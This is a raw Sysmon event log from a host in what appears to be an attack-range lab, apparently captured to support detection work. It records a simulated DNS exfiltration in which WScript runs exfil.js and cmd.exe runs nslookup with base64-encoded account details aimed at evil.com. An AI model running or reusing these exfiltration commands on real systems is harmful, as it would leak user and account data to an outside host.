14:16:08.137{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.137{2E1864BB-17A1-629A-783D-000000005F02}55521716C:\Windows\System32\WScript.exe{2E1864BB-17A8-629A-F43D-000000005F02}4996C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.139{2E1864BB-17A8-629A-F43D-000000005F02}4996C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxfxrff.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.121{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrjswwo.tmpMD5=14EFE03E0C67AE598772AE00481DF4D7,SHA256=91A875FE4CE713F3E89451B0A4F3D74F67372C5460101AA4ED9323B82D4A430D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000194744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.445{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52139- 354300x8000000000000000194743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.445{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52138- 354300x8000000000000000194742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.444{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52137- 354300x8000000000000000194741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.444{00000000-0000-0000-0000-000000000000}5896<unknown process>-udptruefalse127.0.0.1-52137-false127.0.0.1-53domain 354300x8000000000000000194740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.366{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52136- 354300x8000000000000000194739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.366{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52135- 354300x8000000000000000194738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.366{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52134- 354300x8000000000000000194737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.798{00000000-0000-0000-0000-000000000000}3348<unknown process>-udptruefalse127.0.0.1-52124-false127.0.0.1-53domain 10341000x8000000000000000194736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.105{2E1864BB-17A8-629A-F23D-000000005F02}64485420C:\Windows\system32\conhost.exe{2E1864BB-17A8-629A-F33D-000000005F02}7352C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.105{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.105{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.105{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.105{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.105{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-F33D-000000005F02}7352C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.105{2E1864BB-17A8-629A-F13D-000000005F02}62205168C:\Windows\system32\cmd.exe{2E1864BB-17A8-629A-F33D-000000005F02}7352C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.113{2E1864BB-17A8-629A-F33D-000000005F02}7352C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A8-629A-F13D-000000005F02}6220C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrjswwo.tmp 2>&1 10341000x8000000000000000194728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.084{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A8-629A-F23D-000000005F02}6448C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.084{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A8-629A-F23D-000000005F02}6448C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.084{2E1864BB-17A8-629A-F23D-000000005F02}64485420C:\Windows\system32\conhost.exe{2E1864BB-17A8-629A-F13D-000000005F02}6220C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.084{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-F23D-000000005F02}6448C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.068{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.068{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.068{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.068{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.068{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-F13D-000000005F02}6220C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.068{2E1864BB-17A1-629A-783D-000000005F02}55526084C:\Windows\System32\WScript.exe{2E1864BB-17A8-629A-F13D-000000005F02}6220C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.078{2E1864BB-17A8-629A-F13D-000000005F02}6220C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrjswwo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.068{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljfcv.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.037{2E1864BB-17A8-629A-EF3D-000000005F02}41282944C:\Windows\system32\conhost.exe{2E1864BB-17A8-629A-F03D-000000005F02}7224C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.037{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.037{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.037{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 